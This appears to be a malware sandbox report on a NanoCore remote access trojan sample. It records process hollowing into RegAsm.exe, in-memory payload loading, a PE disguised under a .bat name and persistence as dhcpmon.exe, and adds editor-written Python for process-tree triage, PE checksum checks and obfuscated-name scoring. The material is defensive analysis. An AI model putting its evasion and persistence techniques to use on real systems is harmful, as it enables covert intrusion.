        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Note: the class names above are shown with their original characters ('#', '=', '$'); the raw report printed them as unicode escapes with the backslashes stripped (u0023, u003d, u0024). The same decompiled classes, with the same members, appear in the sample's unpacked region (0.3), in the dropped .bat image (2.3) and in the hollowed RegAsm.exe (3.2), so all three carry one and the same embedded .NET payload. WindowsIdentity::GetCurrent() followed by WindowsPrincipal::IsInRole(WindowsBuiltInRole) is the standard .NET test for membership in the Administrators group; the install path chosen in this run, C:\Program Files (x86)\DHCP Monitor (see the file-created entries below), is only writable by an elevated process and is consistent with that check having succeeded in the sandbox.
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/7@8/2
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_0042A2D5: GetLastError, FormatMessageW
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_00418713: AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_00418CC3: LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_0042B59E: SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_00423E91: PeekMessageW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FindCloseChangeNotification
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_0042C602: CoInitialize, CoCreateInstance, CoUninitialize
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003C4FE9: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Program Files (x86)\DHCP Monitor
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File created: C:\Users\user\hdwwiz
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
Note: the WilError_01 mutex is created by every conhost.exe and ".net clr networking" by the networking classes of any .NET Framework process; neither identifies this sample (the second only shows that the payload inside RegAsm.exe uses System.Net). The GUID-named global mutex is created by the injected payload alone and is the one worth carrying as an indicator.
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: section .text has IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Note: the Safer\CodeIdentifiers key holds Software Restriction Policy rules and is consulted during process creation, so this read is expected from any process that launches another and carries little signal on its own.
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Virustotal: Detection: 66%
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Metadefender: Detection: 37%
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File read: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe
Source: unknown | Process created: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe, command line: 'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: unknown | Process created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat, command line: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe (second instance), command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, command line: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Note: RegAsm.exe is started twice with no arguments, once by the sample and once by the dropped copy. RegAsm.exe only prints its usage when run without arguments, so each instance exists to host injected code, and the NanoCore payload is indeed found in 3.2.RegAsm.exe.400000.0.unpack above. The dropped file runs as a native PE despite its .bat extension: the report records it as its own process image with disassembled code functions (2_2_...), not as a cmd.exe child, so extension-based controls never saw a script.
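The process tree above (sample, two argument-less RegAsm.exe instances, a PE executed under a .bat name, and a copy in a "DHCP Monitor" directory) is a pattern that can be triaged from process-creation telemetry alone. The following is an added example by the editor, not Joe Sandbox code: four rules applied to events constructed from this report's process list. The host-utility list, the trusted-directory prefixes and the parents marked "assumed" (the report records them as "unknown") are the editor's assumptions.

```python
"""Process-tree triage rules modelled on the process list in this report.

Editor's added example, not sandbox code. The events below are constructed
from the report's process-creation lines; parents marked "assumed" are not
stated in the report.
"""
import ntpath
import shlex
from dataclasses import dataclass

# .NET Framework utilities that are routinely used as hollowing/injection
# hosts. Assumption: this is the editor's starting list, not an official one.
DOTNET_HOSTS = {
    "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
    "applaunch.exe", "csc.exe", "vbc.exe", "aspnet_compiler.exe",
}
# Extensions under which a PE image is normally executed directly.
PE_EXTENSIONS = {".exe", ".com", ".scr"}
# Locations a standard user cannot write to (case-insensitive prefixes).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass(frozen=True)
class ProcEvent:
    image: str         # full path of the new process image
    cmdline: str       # command line as recorded
    parent_image: str  # full path of the creating process


def _base(path):
    return ntpath.basename(path).lower()


def _in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def _has_arguments(cmdline):
    # posix=False keeps backslashes and quoted Windows paths intact.
    return len(shlex.split(cmdline, posix=False)) > 1


def rules_for(ev):
    """Return the set of triage rule names the event trips."""
    hits = set()
    name = _base(ev.image)
    if name in DOTNET_HOSTS and not _has_arguments(ev.cmdline):
        # RegAsm/RegSvcs/InstallUtil only print usage when run without
        # arguments; an argument-less launch is the shape of a hollowed host.
        hits.add("dotnet_host_without_arguments")
    if name in DOTNET_HOSTS and not _in_trusted_dir(ev.parent_image):
        hits.add("dotnet_host_spawned_from_user_path")
    if ntpath.splitext(name)[1] not in PE_EXTENSIONS:
        # The recorded image is a PE that ran under a non-executable
        # extension (".bat" here): it never went through cmd.exe, so
        # extension-based controls and logging did not see a script.
        hits.add("pe_executed_under_non_exe_extension")
    if _base(ev.parent_image) in DOTNET_HOSTS and name not in DOTNET_HOSTS:
        # A registration utility does not normally start other programs.
        hits.add("spawned_by_dotnet_host")
    return hits


def triage(events):
    """Map each flagged image path to the union of rules it tripped."""
    report = {}
    for ev in events:
        hits = rules_for(ev)
        if hits:
            report.setdefault(ev.image, set()).update(hits)
    return report


SAMPLE = r"C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
DROPPED = r"C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat"
DHCPMON = r"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"

# Constructed from the report's process tree.
EVENTS = [
    ProcEvent(SAMPLE, '"' + SAMPLE + '"', r"C:\Windows\explorer.exe"),  # parent assumed
    ProcEvent(REGASM, REGASM, SAMPLE),
    ProcEvent(DROPPED, '"' + DROPPED + '"', SAMPLE),                    # parent assumed
    ProcEvent(REGASM, REGASM, DROPPED),
    ProcEvent(DHCPMON, '"' + DHCPMON + '"', REGASM),                    # parent assumed
]

if __name__ == "__main__":
    for image, hits in triage(EVENTS).items():
        print(image, sorted(hits))
```

A legitimate RegAsm.exe run (installer parent under C:\Windows, `/codebase` plus a DLL path on the command line) trips none of the rules, which is the point of keying on an empty command line and an untrusted parent rather than on the image name alone. dhcpmon.exe is only caught through its parent; on a host where the parent is unknown, the RegAsm.pdb string reported for it further down is the file-level handle on it.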
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
Note: {00021401-0000-0000-C000-000000000046} is CLSID_ShellLink; resolving its InProcServer32 is what creating a shortcut through IShellLink looks like, and it matches the WinSAT.lnk the sample writes to the Startup folder (listed under Data Obfuscation below).
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static file information: file size 1124920 bytes (> 1048576)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: RegAsm.pdb | found in: dhcpmon.exe, dhcpmon.exe.1.dr
Note: the PDB path of RegAsm.exe inside dhcpmon.exe and its dropped copy is consistent with the persistence binary in C:\Program Files (x86)\DHCP Monitor being a copy of the RegAsm.exe host rather than of the sample; the payload is injected into it at runtime in the same way.
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory IMAGE_DIRECTORY_ENTRY_IMPORT is in section .rdata
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory IMAGE_DIRECTORY_ENTRY_RESOURCE is in section .rsrc
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory IMAGE_DIRECTORY_ENTRY_BASERELOC is in section .reloc
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in section .rdata
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: data directory IMAGE_DIRECTORY_ENTRY_IAT is in section .rdata

Data Obfuscation:

.NET source code contains potential unpacker
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.RegAsm.exe.400000.0.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== calls System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Note: Assembly.Load(byte[]) loads a managed module straight from a memory buffer, so the next stage is decrypted (the CreateDecryptor/TransformFinalBlock calls listed under the cryptographic APIs above) and executed without ever being written to disk. Both load sites are present in all three memory images.
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_0043C304: LoadLibraryA, GetProcAddress
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr | Static PE information: stored header checksum 0xeeb70, computed over the file: 0x11e6ba (mismatch)
Source: d4e475d7d17a16be8b9eeac6e10b25af.exe | Static PE information: stored header checksum 0xeeb70, computed over the file: 0x1228ef (mismatch)
Note: a non-zero CheckSum that no longer matches the file means the image was modified after the linker set the field (a packer or builder that appended or patched data without recomputing it). The dropped .bat carries the same stored value as the sample but a different computed one, so the two files differ in content while sharing the same original header.
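The two checksum entries above are the result of recomputing the PE header's CheckSum field over the whole file. The following is an added example by the editor, not sandbox code, that performs that computation (the same arithmetic as ImageHlp's CheckSumMappedFile) and classifies the result. The image it runs on is a constructed header-only stub: only the stored value 0xEEB70 is taken from the report, the sample's bytes are not reproduced, so the computed value below is the stub's, not the report's.

```python
"""Recompute the PE header CheckSum and compare it with the stored value.

Editor's added example, not sandbox code. SAMPLE_IMAGE is a constructed
header-only stub: only the stored CheckSum value (0xEEB70) is taken from the
report; the rest of the sample's bytes are not reproduced here.
"""
import struct


def checksum_field_offset(data):
    """Offset of OptionalHeader.CheckSum: e_lfanew + 4 (signature) + 20 (COFF) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew + 4 + 20 + 64


def stored_checksum(data):
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def compute_checksum(data):
    """Ones'-complement sum of all 16-bit words with the 4-byte CheckSum
    field treated as zero, folded to 16 bits, plus the file length."""
    skip = checksum_field_offset(data)
    padded = data + (b"\0" if len(data) % 2 else b"")
    total = 0
    for off in range(0, len(padded), 2):
        if skip <= off < skip + 4:
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def checksum_status(data):
    """'unset' (field is 0, common for user-mode binaries), 'match', or
    'mismatch' (the file changed after the checksum was written)."""
    stored = stored_checksum(data)
    if stored == 0:
        return "unset"
    return "match" if stored == compute_checksum(data) else "mismatch"


def _stub(stored):
    """Build the smallest buffer the functions above will accept."""
    img = bytearray(0xA0)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)      # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x58, 0x10B)      # OptionalHeader.Magic = PE32
    struct.pack_into("<I", img, 0x98, stored)     # OptionalHeader.CheckSum
    return bytes(img)


SAMPLE_IMAGE = _stub(0xEEB70)  # constructed stub carrying the report's stored value

if __name__ == "__main__":
    print(hex(stored_checksum(SAMPLE_IMAGE)), hex(compute_checksum(SAMPLE_IMAGE)),
          checksum_status(SAMPLE_IMAGE))
```

Only a non-zero, mismatching field is a finding: most user-mode binaries ship with the field at zero, and Windows enforces the checksum only for drivers and boot-time images, so a mismatch never stops the file from running; it is a marker of post-link tampering, nothing more.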
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003D43B7: push edi; ret (at 2_2_003D43B9)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003D43CB: push edi; ret (at 2_2_003D43CD)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003CC590: push eax; retn 003Ch (at 2_2_003CC599)
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function 2_2_003E8B85: push ecx; ret (at 2_2_003E8B98)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function 7_2_04CB0007: push cs; retf (at 7_2_04CB001E)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function 7_2_04CB00B9: push ds; iretd (at 7_2_04CB00BA)
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function 7_2_04CB001F: push ds; iretd (at 7_2_04CB006A)
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack and 3.2.RegAsm.exe.400000.0.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack and 3.2.RegAsm.exe.400000.0.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
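The "high entropy of concatenated method names" entries flag member renaming: every type and method in these classes is named `#=q` followed by a base64-style string, the renaming scheme characteristic of .NET Reactor. The following is an added example by the editor, not sandbox code, that decodes the escaped form the raw report prints these names in, measures the entropy the signature is based on, and checks the names against that pattern. The renamed names are copied from the first entry above; the plain names used for comparison and the regular expression are the editor's.

```python
"""Decode the escaped class names in this report and score method-name entropy.

Editor's added example, not sandbox code. RENAMED_METHODS are copied from the
report's "High entropy of concatenated method names" entry; PLAIN_METHODS
are made up for comparison.
"""
import math
import re
from collections import Counter

# The raw report shows "\u0023\u003d\u0024" with the backslashes stripped.
# Only these three escapes are decoded: a bare "u" followed by four hex
# digits can also occur by chance inside a base64-style name, so a general
# \uXXXX decoder would corrupt real names.
_ESCAPES = {"u0023": "#", "u003d": "=", "u0024": "$"}
_ESCAPE_RE = re.compile("|".join(_ESCAPES))
# Renamed members in this sample: "#=q" + base64 alphabet plus "_" and "$",
# optionally "="-padded. Assumption: pattern written from the names below.
_RENAMED_RE = re.compile(r"#=q[A-Za-z0-9_$]+=*")


def decode_report_name(name):
    """'u0023u003dqjIje...u003du003d.cs' -> '#=qjIje...==.cs'"""
    return _ESCAPE_RE.sub(lambda m: _ESCAPES[m.group(0)], name)


def shannon_entropy(text):
    """Bits per character of the string's own symbol distribution (max 8)."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_renamed(name):
    return _RENAMED_RE.fullmatch(name) is not None


def score_methods(methods):
    """Entropy over the concatenated names plus whether every name is renamed."""
    joined = "".join(methods)
    return {
        "entropy": round(shannon_entropy(joined), 2),
        "all_renamed": all(looks_renamed(m) for m in methods),
        "distinct_symbols": len(set(joined)),
    }


RENAMED_METHODS = [  # copied from the report
    "#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=",
    "#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=",
    "#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq",
    "#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=",
    "#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=",
    "#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA",
    "#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=",
    "#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=",
    "#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=",
    "#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs=",
]
PLAIN_METHODS = ["Initialize", "Connect", "SendPacket", "Dispose"]  # made up

if __name__ == "__main__":
    print(decode_report_name("u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs"))
    print(score_methods(RENAMED_METHODS))
    print(score_methods(PLAIN_METHODS))
```

Entropy alone is a weak discriminator (a class with long English names also scores fairly high); the `#=q` prefix is the specific signal, and the entropy figure mainly confirms the suffixes are not dictionary words.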
Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe | File created (dropped file): C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created (dropped file): C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
